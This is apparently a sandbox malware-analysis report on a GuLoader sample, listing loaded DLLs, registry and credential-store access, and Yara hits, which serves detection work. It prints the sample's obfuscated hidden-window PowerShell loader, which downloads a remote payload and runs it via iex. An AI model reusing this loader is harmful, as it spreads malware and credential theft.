              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: pdh.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: mlang.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\relog.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeSection loaded: wininet.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeSection loaded: mswsock.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeSection loaded: dnsapi.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeSection loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeSection loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: wab.exe
              Source: Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 0000001A.00000002.2815364367.0000000004843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.2702490356.000000000A283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.2668039251.0000000005634000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.2701170946.00000000085A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2199790164.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((badarrah $Repine $Radiologernes), (Klassekvotienterne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Squamate = [AppDomain]::CurrentDomain.GetAssemblies()
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mercerization)), $Tradeful).DefineDynamicModule($Caic, $false).DefineType($Brandishing, $Gundeck, [System.MulticastDelegate])$Dissoul.
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tvetunget $Sagsomkostninger $Regeringernes), (Komponentplaceringstegning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:udgangsforbud = [AppDomain]::Curre
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tallote)), $Nektarin199).DefineDynamicModule($Unoriginal, $false).DefineType($Rhabdom, $Vedhftendes, [System.MulticastDelegate])$Debar
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe
              Obfuscated command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b 